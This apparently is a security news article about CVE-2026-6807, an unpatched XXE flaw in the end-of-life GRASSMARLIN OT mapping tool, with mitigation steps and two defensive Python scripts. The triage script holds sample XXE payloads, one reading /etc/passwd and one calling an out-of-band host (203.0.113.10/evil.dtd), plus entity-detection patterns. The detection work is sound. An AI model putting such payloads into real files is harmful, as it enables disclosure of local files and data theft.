LIVE NEWSROOM · May 24, 2026

NSA GRASSMARLIN CVE-2026-6807: XXE Flaw in End-of-Life OT Tool Has No Patch


NSA GRASSMARLIN, an open-source ICS and SCADA network-mapping tool widely used in operational technology environments, carries a newly disclosed XML external entity (XXE) injection vulnerability tracked as CVE-2026-6807. The tool is end-of-life, meaning no patch is coming from the vendor — organizations still running it need to mitigate or retire the software now.

// 01 CVE-2026-6807: What We Know So Far

CISA published ICS Advisory ICSA-26-118-01 on May 1, 2026, detailing the flaw. CVE-2026-6807 is rated medium severity and stems from the way GRASSMARLIN's session and data import paths parse XML: external entity declarations in the input are honoured, so an attacker who can get a crafted file in front of the tool, typically a tampered project file or another XML-based import, can make the parser read local files or reach internal network locations with the analyst's privileges. Depending on the payload, the retrieved content is either folded into the parsed document or sent out of band to a host the attacker controls.

GRASSMARLIN is a passive network-mapping tool, written in Java, built for ICS/SCADA environments. It reads PCAP files and Cisco IOS configurations offline to map device relationships without actively probing sensitive OT networks. That offline-analysis design means organizations often deploy it on air-gapped or restricted-access analyst machines, machines that may hold highly sensitive network topology data, credentials, or device inventories for critical infrastructure. The Java angle matters: the platform's standard XML parsers have historically resolved external entities unless the application explicitly turns that off, which is exactly the kind of hardening an unmaintained project will never receive.

The CVSS base score is medium, but the practical risk is higher than the rating suggests: GRASSMARLIN is end-of-life with no upstream development, so there is no patch and none scheduled. Any organization still using it must treat CVE-2026-6807 as a permanently unpatched vulnerability and either retire the tool or implement strict compensating controls.

No public proof-of-concept code has been released as of writing, but that is little comfort. ICSA-26-118-01 notes that a relatively low skill level is required to exploit this class of vulnerability once an attacker can craft or deliver a malicious input file, and XXE payloads are well documented; the only tool-specific work is making the file look like something the import path will accept.

// 02 Why CVE-2026-6807 Matters for OT Defenders

OT network analysts typically load GRASSMARLIN with PCAP captures from production ICS networks, captures that contain complete visibility into device-to-device communications, protocol behavior, and engineering workstation traffic. An XXE disclosure from a GRASSMARLIN session could expose that intelligence to any attacker capable of planting a malicious project or capture file. The exposure is bounded by what the parser can read with the analyst's privileges, which on an analyst workstation usually includes saved captures, exports, and whatever credential material sits in the user's profile, and the attacker still needs a way to get the data out: an outbound channel from the host, or a later chance to retrieve the altered session file.

ICS attack chains frequently begin with compromise of IT-side systems that then reach analyst workstations. If an analyst opens a GRASSMARLIN project file sourced from a compromised share or email attachment, the parser resolves the external entity during import with no prompt and nothing visible to the analyst beyond, at most, an oddly formed session.

The wider concern is tool sprawl in OT security operations. GRASSMARLIN was a well-regarded passive mapping tool, and many teams adopted it years ago without a formal decommission plan. The combination of end-of-life status, no patch path, and continued deployment in sensitive environments makes CVE-2026-6807 an urgent housekeeping item for any SOC team that touches OT infrastructure.

// 03 CVE-2026-6807: What You Should Do Now

  • Audit GRASSMARLIN deployments immediately. Inventory every workstation running GRASSMARLIN across your OT, IT, and security operations environments. Check installed versions and whether the tool is still in active use.
  • Retire GRASSMARLIN where possible. CISA recommends migrating to maintained alternatives. Passive OT network visibility can be achieved through supported tools such as Claroty, Dragos, or Nozomi Networks — all under active development.
  • If retirement is not immediately possible, isolate GRASSMARLIN workstations. Restrict network access to the minimum required. Enforce a policy that only verified, internally generated PCAP files are loaded and that session or project files come only from a controlled location that less-trusted segments cannot write to; never open project files from untrusted sources. A file the tool will parse as XML has no business containing a DOCTYPE or ENTITY declaration, so refuse any that does before it is opened.
  • Block outbound connections from GRASSMARLIN hosts, not just web traffic. Out-of-band XXE exfiltration uses whatever the parser's URL handlers support, which in Java includes HTTP, HTTPS and FTP, and the first sign of a callback is usually a plain DNS lookup. A default-deny egress policy with an explicit allowlist contains an exploited host; rules that only cover ports 80 and 443 do not. Egress filtering also does nothing against in-band disclosure, where the leaked content lands inside the saved session and the attacker collects it later from a share.
  • Track the advisory in your vulnerability management platform. Ensure ICSA-26-118-01 is assigned to an owner with a formal remediation or retirement deadline.
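The "refuse any file carrying a DOCTYPE or ENTITY declaration" control above is cheap to automate, and the same script makes concrete what the crafted input described in section 01 actually looks like. The following is an added example written for this page; it is not GRASSMARLIN code and not taken from the advisory. It inspects raw bytes rather than parsing, because the whole point is never to hand an untrusted file to an entity-resolving parser. The session element names, the file targets and the 203.0.113.10 address in the samples are constructed for illustration.

```python
"""Pre-import triage for XML files bound for a parser with a known XXE.

Added example (not GRASSMARLIN code): the entity-declaration patterns
checked here are the generic ones that make XXE possible; the sample files
below are constructed for illustration and not taken from the tool.
"""
import re
import sys
from dataclasses import dataclass, field
from typing import List

# Byte regexes on the raw file, on purpose: the decision is whether a file
# may be opened at all, made without giving it to any XML parser.
DOCTYPE_RE = re.compile(rb"<!DOCTYPE\b", re.IGNORECASE)
# Matches <!ENTITY name SYSTEM "uri">, <!ENTITY name PUBLIC "id" "uri"> and
# the parameter-entity form <!ENTITY % name SYSTEM "uri"> used for
# out-of-band XXE, where the fetched DTD carries the exfiltration logic.
ENTITY_RE = re.compile(
    rb"<!ENTITY\s+(?P<pe>%\s*)?(?P<name>[^\s%>]+)\s+"
    rb"(?P<kind>SYSTEM|PUBLIC)\b(?P<rest>[^>]*)>",
    re.IGNORECASE | re.DOTALL,
)
QUOTED_RE = re.compile(rb"[\"']([^\"']*)[\"']")
# XInclude can read local files with no DTD at all, so it is flagged too.
XINCLUDE_RE = re.compile(rb"<(?:[\w-]+:)?include\b[^>]*\bhref\s*=", re.IGNORECASE)


@dataclass
class Finding:
    rule: str
    detail: str


@dataclass
class TriageResult:
    findings: List[Finding] = field(default_factory=list)

    @property
    def safe_to_import(self) -> bool:
        return not self.findings

    @property
    def rules(self) -> List[str]:
        return [f.rule for f in self.findings]


def triage_xml(data: bytes) -> TriageResult:
    """Return every DTD/XInclude construct that could make a parser fetch
    something the file should not be able to reach."""
    result = TriageResult()
    # A UTF-16 file would slip past byte patterns, so normalise it first.
    if data[:2] in (b"\xff\xfe", b"\xfe\xff"):
        data = data.decode("utf-16").encode("utf-8")
    if DOCTYPE_RE.search(data):
        result.findings.append(
            Finding("doctype", "DTD present; a session file has no reason to carry one"))
    for m in ENTITY_RE.finditer(data):
        quoted = QUOTED_RE.findall(m.group("rest"))
        # For PUBLIC the last quoted string is the URI; for SYSTEM it is the only one.
        uri = quoted[-1].decode(errors="replace") if quoted else "?"
        scope = "parameter" if m.group("pe") else "general"
        name = m.group("name").decode(errors="replace")
        result.findings.append(Finding(f"external-{scope}-entity", f"{name} -> {uri}"))
    if XINCLUDE_RE.search(data):
        result.findings.append(Finding("xinclude", "XInclude href can read local files without a DTD"))
    return result


# Constructed samples. Element names merely imitate a session file; the
# target path and 203.0.113.10 (RFC 5737 documentation range) are invented.
BENIGN = b'<?xml version="1.0"?><session><host ip="10.0.0.5" role="plc"/></session>'
CLASSIC_XXE = (
    b'<?xml version="1.0"?>'
    b'<!DOCTYPE session [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>'
    b'<session><host ip="&xxe;"/></session>'
)
OOB_XXE = (
    b'<?xml version="1.0"?>'
    b'<!DOCTYPE session [<!ENTITY % dtd SYSTEM "http://203.0.113.10/evil.dtd"> %dtd;]>'
    b'<session/>'
)


if __name__ == "__main__":
    # Usage: python triage.py session1.xml session2.xml ...  (exit 1 if any file is rejected)
    bad = 0
    for path in sys.argv[1:]:
        with open(path, "rb") as fh:
            res = triage_xml(fh.read())
        print(f"{path}: {'OK' if res.safe_to_import else 'REJECT'}")
        for f in res.findings:
            print(f"  [{f.rule}] {f.detail}")
        bad += not res.safe_to_import
    sys.exit(1 if bad else 0)
```

Run it against every session or project file before it is copied onto the analyst host; a clean file reports nothing. The check is deliberately conservative: a DOCTYPE alone is rejected even with no external entity, because internal entities still enable entity-expansion denial of service, and if the session format wraps its XML in a container, unpack it and scan the XML parts.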

// 04 Detection and Verification Checklist

  • Confirm GRASSMARLIN install status: check %ProgramFiles%, %ProgramData%, and analyst desktop directories on all OT-adjacent Windows workstations, and the package database and /opt on Linux analyst hosts, since the tool was also shipped for Linux.
  • Verify no automated jobs are feeding GRASSMARLIN from live capture infrastructure.
  • Review DNS, proxy and firewall logs for any outbound lookups or connections from hosts where GRASSMARLIN is installed. On an isolated analyst host every one of them is anomalous; lookups of unfamiliar external names or connections to non-web ports around the time a session file was opened are the signature of an XXE callback.
  • Check whether GRASSMARLIN project files are stored in shared locations accessible from less-trusted network segments.
  • Reference CISA ICS Advisory ICSA-26-118-01 directly and assign a formal decommission date.
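The log review in the checklist above, as an added example that is not from the page, the advisory or the tool: a small hunt that takes the host list produced by the inventory step and flags every outbound DNS lookup or connection those hosts made, marking DNS names with oversized labels as possible exfiltration. The log schema, the host addresses, the internal ranges and the corp.example DNS suffix are assumptions, and the log excerpt is constructed; replace parse_line() with your proxy, DNS or firewall log format.

```python
"""Egress hunt for GRASSMARLIN analyst hosts.

Added example, not from the page or the tool: the log format, host list,
internal ranges and DNS suffix are assumptions, and the log excerpt is
constructed so the logic runs offline.
"""
import ipaddress
from collections import Counter
from dataclasses import dataclass
from typing import Dict, Iterable, List

# Assumption: the inventory step produced this list of hosts running GRASSMARLIN.
GRASSMARLIN_HOSTS = {"10.20.30.11", "10.20.30.12"}
# Assumption: anything outside RFC 1918 counts as outbound for these hosts.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
# Assumption: the organisation's internal DNS suffix.
INTERNAL_DNS_SUFFIXES = ("corp.example",)
LONG_LABEL = 30   # DNS labels this long usually carry smuggled data rather than names


@dataclass
class Alert:
    ts: str
    host: str
    kind: str      # "dns" or "egress"
    detail: str


def is_internal_ip(ip: str) -> bool:
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:
        return False          # a bare hostname: treat as external until proven otherwise
    return any(addr in net for net in INTERNAL_NETS)


def is_internal_name(name: str) -> bool:
    name = name.rstrip(".").lower()
    # Match on a label boundary so "evilcorp.example" does not pass as "corp.example".
    return any(name == s or name.endswith("." + s) for s in INTERNAL_DNS_SUFFIXES)


def parse_line(line: str):
    # Constructed schema: "<timestamp> <src_ip> <proto> <target>", proto in {dns, http, https, tcp}
    ts, src, proto, target = line.split(maxsplit=3)
    return ts, src, proto.lower(), target


def hunt(lines: Iterable[str], hosts=GRASSMARLIN_HOSTS) -> List[Alert]:
    """Every outbound lookup or connection from a GRASSMARLIN host is an
    alert: under the isolation control these hosts should have none."""
    alerts: List[Alert] = []
    for line in lines:
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        ts, src, proto, target = parse_line(line)
        if src not in hosts:
            continue
        if proto == "dns":
            if is_internal_name(target):
                continue
            suspicious = any(len(label) > LONG_LABEL for label in target.split("."))
            detail = f"external lookup {target}" + (" (possible exfil)" if suspicious else "")
            alerts.append(Alert(ts, src, "dns", detail))
        else:
            dst = target.rsplit(":", 1)[0]    # strip an optional :port
            if not is_internal_ip(dst):
                alerts.append(Alert(ts, src, "egress", f"{proto} to {target}"))
    return alerts


def summarize(alerts: List[Alert]) -> Dict[str, int]:
    """Alert count per host, to decide which workstations to image first."""
    return dict(Counter(a.host for a in alerts))


# Constructed log excerpt (203.0.113.0/24 and 198.51.100.0/24 are documentation ranges).
SAMPLE_LOG = """
2026-05-20T09:14:02Z 10.20.30.11 dns update.corp.example
2026-05-20T09:14:03Z 10.20.30.11 https 10.20.30.5:443
2026-05-20T09:15:40Z 10.20.30.12 dns ZmlsZTovLy9ldGMvcGFzc3dkIHJvb3Q6eDowOjA.203-0-113-10.example.net
2026-05-20T09:15:41Z 10.20.30.12 http 203.0.113.10:80
# the next host is not on the GRASSMARLIN inventory, so it is ignored
2026-05-20T09:16:00Z 10.20.40.7 https 198.51.100.23:443
2026-05-20T09:17:12Z 10.20.30.11 dns evilcorp.example
"""

if __name__ == "__main__":
    found = hunt(SAMPLE_LOG.splitlines())
    for a in found:
        print(f"{a.ts} {a.host} {a.kind:6} {a.detail}")
    print(summarize(found))
```

On the sample the hunt raises three alerts: the long-label lookup and the HTTP connection from 10.20.30.12, and the look-alike domain queried by 10.20.30.11, while the unrelated host and the legitimate internal traffic stay quiet. Pair any hit with the file-open timeline on that workstation before calling it an XXE callback.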

Sources: SecurityWeek – In Other News, WindowsForum – CVE-2026-6807 Overview


    Team Ciphers Security

